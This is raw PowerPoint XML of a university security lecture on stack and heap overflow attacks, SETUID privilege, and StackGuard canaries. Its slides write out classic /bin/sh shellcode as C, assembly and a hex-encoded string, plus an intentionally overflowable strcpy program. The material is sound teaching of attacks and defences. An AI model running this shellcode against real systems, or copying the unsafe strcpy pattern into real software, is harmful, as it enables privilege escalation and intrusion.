            <a:ext cx="1071598" cy="1898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1922476" y="2493591"/>
            <a:ext cx="1544620" cy="32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2040879" y="4659525"/>
            <a:ext cx="1505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Deal!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4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2493591"/>
            <a:ext cx="648657" cy="6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300px/svg_to_png/176818/User_Icon_Remix_by_Merlin25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4089926"/>
            <a:ext cx="767060" cy="11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9408" y="2151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028" y="372059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11" name="Bevel 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4826976" y="2493591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2" name="Bevel 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3927963" y="1462256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3" name="Bevel 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3294916" y="2761003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4" name="Bevel 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4056181" y="4219428"/>
            <a:ext cx="1414831" cy="880194"/>
          </a:xfrm>
          <a:prstGeom prst="beve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Privileged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922476" y="2817920"/>
            <a:ext cx="1779086" cy="184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99738" y="896815"/>
            <a:ext cx="8793" cy="505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76746" y="76493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53654" y="1573823"/>
            <a:ext cx="116937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accessible resources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42661" y="4145175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Privileged resources</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="Straight Arrow Connector 18"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="14" idx="0"/>
            <a:endCxn id="22" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5471012" y="4659525"/>
            <a:ext cx="1771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>
            <a:off x="5977927" y="5291242"/>
            <a:ext cx="2434111" cy="1058132"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -25529"/>
              <a:gd name="adj2" fmla="val -97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 run with user privileges</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="&quot;No&quot; Symbol 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6699738" y="4348931"/>
            <a:ext cx="593482" cy="589085"/>
          </a:xfrm>
          <a:prstGeom prst="noSmoking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SETUID Programs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4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2493591"/>
            <a:ext cx="648657" cy="6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300px/svg_to_png/176818/User_Icon_Remix_by_Merlin25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19" y="4089926"/>
            <a:ext cx="767060" cy="11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89408" y="21516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028" y="372059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11" name="Bevel 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4826976" y="2493591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2" name="Bevel 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3927963" y="1462256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3" name="Bevel 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3294916" y="2761003"/>
            <a:ext cx="1288073" cy="917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4" name="Bevel 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4056181" y="4219428"/>
            <a:ext cx="1414831" cy="880194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Privileged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922476" y="2817920"/>
            <a:ext cx="1779086" cy="184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99738" y="896815"/>
            <a:ext cx="8793" cy="505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76746" y="76493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53654" y="1573823"/>
            <a:ext cx="1169377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accessible resources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42661" y="4145175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Privileged resources</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="Straight Arrow Connector 18"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="14" idx="0"/>
            <a:endCxn id="22" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5471012" y="4659525"/>
            <a:ext cx="1771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loud Callout 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3305904" y="5444521"/>
            <a:ext cx="3325692" cy="838009"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -18735"/>
              <a:gd name="adj2" fmla="val -79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SETUID Programs run with their privileges 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Overflow Attacks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8693" y="3294644"/>
            <a:ext cx="648657" cy="990604"/>
            <a:chOff x="1273819" y="2151644"/>
            <a:chExt cx="648657" cy="990604"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7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4" name="Bevel 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3263150" y="3560429"/>
            <a:ext cx="1414831" cy="800980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Privileged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4" idx="4"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1657350" y="3960919"/>
            <a:ext cx="1605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08578" y="3446569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Privileged resources</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="Straight Arrow Connector 18"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="14" idx="0"/>
            <a:endCxn id="22" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4677981" y="3960919"/>
            <a:ext cx="2430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8578" y="4724385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privileged </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>resources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8577" y="1991677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privileged </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>resources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9364" y="2989365"/>
            <a:ext cx="1732558" cy="44698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Input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Stack Overflow Attacks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08693" y="3294644"/>
            <a:ext cx="648657" cy="990604"/>
            <a:chOff x="1273819" y="2151644"/>
            <a:chExt cx="648657" cy="990604"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7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4" name="Bevel 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3263150" y="3560429"/>
            <a:ext cx="1414831" cy="800980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Privileged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4" idx="4"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1657350" y="3960919"/>
            <a:ext cx="1605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08578" y="3446569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Privileged resources</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="Straight Arrow Connector 18"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="14" idx="0"/>
            <a:endCxn id="22" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4677981" y="3960919"/>
            <a:ext cx="2430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8578" y="4724385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privileged </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>resources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8577" y="1991677"/>
            <a:ext cx="1169377" cy="1028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privileged </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>resources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9364" y="2989365"/>
            <a:ext cx="1732558" cy="44698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Input</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34822" name="Picture 6" descr="Linux Terminal Window Des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1" y="2458842"/>
            <a:ext cx="3802726" cy="30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34822" idx="3"/>
            <a:endCxn id="31" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5808367" y="2506027"/>
            <a:ext cx="1300210" cy="14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822" idx="3"/>
            <a:endCxn id="30" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5808367" y="3960919"/>
            <a:ext cx="1300211" cy="1277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Overflow Attacks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8693" y="3215513"/>
            <a:ext cx="648657" cy="990604"/>
            <a:chOff x="1273819" y="2151644"/>
            <a:chExt cx="648657" cy="990604"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8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0" y="2057400"/>
            <a:ext cx="3349869" cy="3613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1662" y="1664016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www.stevens.edu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1657350" y="3864219"/>
            <a:ext cx="2914650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9386" y="2772015"/>
            <a:ext cx="194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Host: www</a:t>
            </a:r>
          </a:p>
          <a:p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HTTP Server: </a:t>
            </a:r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419" y="3739017"/>
            <a:ext cx="721068" cy="14266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>
            <a:off x="4572000" y="3864219"/>
            <a:ext cx="1292419" cy="588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Java,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  <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Compiles to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bytecode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, run by the Java virtual machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Initially interpreted, quickly just-in-time </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>translated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Mix of compile and JIT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>safe and strongly typed</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Automatic memory management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implicit memory access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Overflow Attacks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8693" y="3215513"/>
            <a:ext cx="648657" cy="990604"/>
            <a:chOff x="1273819" y="2151644"/>
            <a:chExt cx="648657" cy="990604"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8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0" y="2057400"/>
            <a:ext cx="3349869" cy="3613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1662" y="1664016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www.stevens.edu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1657350" y="3864219"/>
            <a:ext cx="2914650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9386" y="2772015"/>
            <a:ext cx="194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Host: www</a:t>
            </a:r>
          </a:p>
          <a:p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HTTP Server: </a:t>
            </a:r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419" y="3739017"/>
            <a:ext cx="721068" cy="14266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>
            <a:off x="4572000" y="3864219"/>
            <a:ext cx="1292419" cy="588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VE-2013-2028 Nginx HTTP Server 1.3.9-1.4.0 Chunked Encoding Stack Buffer Overflow | Rapid7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21279" r="15527" b="62962"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1333020" y="2815597"/>
            <a:ext cx="7064553" cy="130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Overflow Attacks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8693" y="3215513"/>
            <a:ext cx="648657" cy="990604"/>
            <a:chOff x="1273819" y="2151644"/>
            <a:chExt cx="648657" cy="990604"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8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0" y="2057400"/>
            <a:ext cx="3349869" cy="3613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1662" y="1664016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www.stevens.edu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1657350" y="3864219"/>
            <a:ext cx="2914650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9386" y="2772015"/>
            <a:ext cx="194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Host: www</a:t>
            </a:r>
          </a:p>
          <a:p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HTTP Server: </a:t>
            </a:r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419" y="3739017"/>
            <a:ext cx="721068" cy="14266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>
            <a:off x="4572000" y="3864219"/>
            <a:ext cx="1292419" cy="588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7772" y="3274019"/>
            <a:ext cx="1732558" cy="44698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Input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9376" y="4336797"/>
            <a:ext cx="12327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Listen for</a:t>
            </a:r>
          </a:p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Overflow Attacks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8693" y="3215513"/>
            <a:ext cx="648657" cy="990604"/>
            <a:chOff x="1273819" y="2151644"/>
            <a:chExt cx="648657" cy="990604"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8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0" y="2057400"/>
            <a:ext cx="3349869" cy="3613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1662" y="1664016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www.stevens.edu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1657350" y="3864219"/>
            <a:ext cx="2914650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9386" y="2772015"/>
            <a:ext cx="194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Host: www</a:t>
            </a:r>
          </a:p>
          <a:p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HTTP Server: </a:t>
            </a:r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419" y="3739017"/>
            <a:ext cx="721068" cy="14266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>
            <a:off x="4572000" y="3864219"/>
            <a:ext cx="1292419" cy="588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7772" y="3274019"/>
            <a:ext cx="1732558" cy="44698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Input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1" idx="1"/>
            <a:endCxn id="25" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2402086" y="4659963"/>
            <a:ext cx="3684414" cy="23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86500" y="4530472"/>
            <a:ext cx="853035" cy="305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9376" y="4336797"/>
            <a:ext cx="12327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Listen for</a:t>
            </a:r>
          </a:p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Overflow Attacks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08693" y="3215513"/>
            <a:ext cx="648657" cy="990604"/>
            <a:chOff x="1273819" y="2151644"/>
            <a:chExt cx="648657" cy="990604"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="Picture 4" descr="http://thecontentwrangler.com/wp-content/uploads/2011/08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819" y="2493591"/>
              <a:ext cx="648657" cy="6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9408" y="215164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0" y="2057400"/>
            <a:ext cx="3349869" cy="36136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1662" y="1664016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www.stevens.edu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 flipV="1">
            <a:off x="1657350" y="3864219"/>
            <a:ext cx="2914650" cy="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9386" y="2772015"/>
            <a:ext cx="194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Host: www</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>OS: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Debian</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTTP Server: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nginx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4419" y="3739017"/>
            <a:ext cx="721068" cy="142668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0" idx="1"/>
            <a:endCxn id="17" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="3864219"/>
            <a:ext cx="1292419" cy="5881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47772" y="3274019"/>
            <a:ext cx="1732558" cy="44698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 Input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1" idx="1"/>
            <a:endCxn id="25" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2402086" y="4659963"/>
            <a:ext cx="3684414" cy="23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86500" y="4530472"/>
            <a:ext cx="853035" cy="3054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69376" y="4336797"/>
            <a:ext cx="12327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Listen for</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>connection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 flipV="1">
            <a:off x="6939535" y="2986802"/>
            <a:ext cx="120688" cy="1696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6939535" y="3881788"/>
            <a:ext cx="478556" cy="801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6939535" y="4683192"/>
            <a:ext cx="478556" cy="9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>
            <a:off x="6939535" y="4683192"/>
            <a:ext cx="478556" cy="89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 assembly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> NASM  Binary code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Code in C  GCC  Binary code GDB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Usually encode binary code as text in C, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>, python, and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fire away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 dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Write </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3869" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>the Code in C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#include &lt;stdio.h&gt;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2429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void main() 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    char *name[2];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2429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    name[0] = "/bin/sh";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    name[1] = NULL;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2429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    execve(name[0], name, NULL);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b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34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2429" b="1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1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In Assembly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void main() { __asm__(" jmp 0x2a # 3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          popl %esi # 1 byte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          movl %esi,0x8(%esi) # 3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          movb $0x0,0x7(%esi) # 4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              movl $0x0,0xc(%esi) # 7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              movl $0xb,%eax # 5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                  movl %esi,%ebx # 2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          leal 0x8(%esi),%ecx # 3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          leal 0xc(%esi),%edx # 3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          int $0x80 # 2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          movl $0x1, %eax # 5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              movl $0x0, %ebx # 5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              int $0x80 # 2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              call -0x2f # 5 bytes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               .string \"/bin/sh\" # 8 bytes "); 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n-US" altLang="en-US" sz="1440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800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>binary code using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" altLang="en-US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1440" b="1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09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Encode in a String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710" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>char shellcode[] = "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00" "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80" "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff" "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" altLang="en-US" sz="2429" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="el-GR" altLang="en-US" sz="2429" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2429" b="1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160" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Shellcode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" altLang="en-US" sz="2160" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>is ready!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2160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The shellcode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2160" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>can be called</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" altLang="en-US" sz="2160" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"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710" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>void main() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"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710" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(*(void(*)()) shellcode)();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"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710" b="1" dirty="0"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1710" b="1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47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4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Putting it all together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17" y="1371314"/>
            <a:ext cx="4701037" cy="5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48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571952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Putting it all together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17" y="1371314"/>
            <a:ext cx="4623901" cy="5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49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39275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Python, Perl,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Dynamically typed (duck type)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Types are checked for suitability at run time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Strong typed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Operations are checked for safety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PHP now also uses JIT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Automatic memory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Putting it all together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54" y="1371314"/>
            <a:ext cx="4898164" cy="5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50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89032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Putting it all together</a:t>
            </a:r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54" y="1371314"/>
            <a:ext cx="4898164" cy="5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51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038295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Putting it all together</a:t>
            </a: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386" y="1371314"/>
            <a:ext cx="5328127" cy="546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52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11461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StackGuard / ProPolice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628650" y="1825625"/>
            <a:ext cx="5798527" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Detects stack overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A call to a function places a special value (canary) between local variables and function return address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A return from a function checks the value of the canary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Part of GCC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0811" y="5606633"/>
            <a:ext cx="563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ftp://gcc.gnu.org/pub/gcc/summit/2003/Stackguard.pdf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6262" y="2102088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retaddr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16262" y="2488949"/>
            <a:ext cx="1116624" cy="386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6262" y="2875810"/>
            <a:ext cx="1116624" cy="3868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7016262" y="484304"/>
            <a:ext cx="1116624" cy="5618285"/>
            <a:chOff x="2206870" y="492369"/>
            <a:chExt cx="1116624" cy="561828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8148380">
            <a:off x="7195527" y="5421967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148380">
            <a:off x="7165510" y="585389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16261" y="3262671"/>
            <a:ext cx="1116624" cy="3868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pic>
        <p:nvPicPr>
          <p:cNvPr id="54274" name="Picture 2" descr="http://sweetclipart.com/multisite/sweetclipart/files/spring_bird_3_yel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09" y="2102087"/>
            <a:ext cx="598687" cy="8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6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 dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>StackGuard / ProPolice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628650" y="1825625"/>
            <a:ext cx="5798527" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Detects stack overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A call to a function places a special value (canary) between local variables and function return address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A return from a function checks the value of the canary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Part of GCC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0811" y="5606633"/>
            <a:ext cx="5635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ftp://gcc.gnu.org/pub/gcc/summit/2003/Stackguard.pdf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6262" y="2102088"/>
            <a:ext cx="1116624" cy="3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retaddr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16262" y="2488949"/>
            <a:ext cx="1116624" cy="386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6262" y="2875810"/>
            <a:ext cx="1116624" cy="3868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7016262" y="484304"/>
            <a:ext cx="1116624" cy="5618285"/>
            <a:chOff x="2206870" y="492369"/>
            <a:chExt cx="1116624" cy="561828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06870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323494" y="492369"/>
              <a:ext cx="0" cy="561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206870" y="492369"/>
              <a:ext cx="111662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8148380">
            <a:off x="7195527" y="5421967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8148380">
            <a:off x="7165510" y="585389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STACK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16261" y="3262671"/>
            <a:ext cx="1116624" cy="3868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pic>
        <p:nvPicPr>
          <p:cNvPr id="54274" name="Picture 2" descr="http://sweetclipart.com/multisite/sweetclipart/files/spring_bird_3_yel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09" y="2102087"/>
            <a:ext cx="598687" cy="8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708746" y="4810786"/>
            <a:ext cx="5130313" cy="15011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From GCC’s documentation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>includes functions that call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>alloca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and functions with buffers larger than 8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Can be disabled </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>with </a:t>
            </a:r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-stack-protector </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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Solved!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55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="78850" name="Picture 2" descr="http://3.bp.blogspot.com/_Bhv1C3sCIC4/TMuxHGLzODI/AAAAAAAADCQ/90gNPEaGe_c/s1600/champagne_c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85" y="1846165"/>
            <a:ext cx="5310552" cy="427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323742" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Variables allocated in the heap dynamically can also be overflown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863970"/>
            <a:ext cx="5607497" cy="454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&lt;stdio.h&gt;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&lt;stdlib.h&gt;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int main(int argc, char *argv[]) {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 = *filed;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*userinput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*outputfile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strcpy(outputfile, "/tmp/foobar");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strcpy(userinput, argv[1]);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filed = fopen(outputfile, "a");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if(filed == NULL){   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    fprintf(stderr, "error opening file %s\n", outputfile);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      exit(1);     }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fprintf(filed, "%s\n", userinput);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fclose(filed);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return 0;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}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1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58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4436207" y="1969715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4436207" y="853091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582933">
            <a:off x="6482068" y="402095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582933">
            <a:off x="1681467" y="4052155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2183" y="3662233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46684" y="3662232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outputfile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170902" y="2204884"/>
            <a:ext cx="2234381" cy="6341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exactly like this!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59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582933">
            <a:off x="6482068" y="402095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582933">
            <a:off x="1681467" y="4052155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2183" y="3662233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55576" y="3662232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outputfile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46684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1130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3291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7737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0077" y="3662231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74523" y="3662231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4436207" y="1969715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4436207" y="853091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0"/>
            <a:endCxn id="17" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2329960" y="4778856"/>
            <a:ext cx="202223" cy="566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2509" y="5345425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Memory management metadata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happens:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When you have the following array: char buffer[4];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
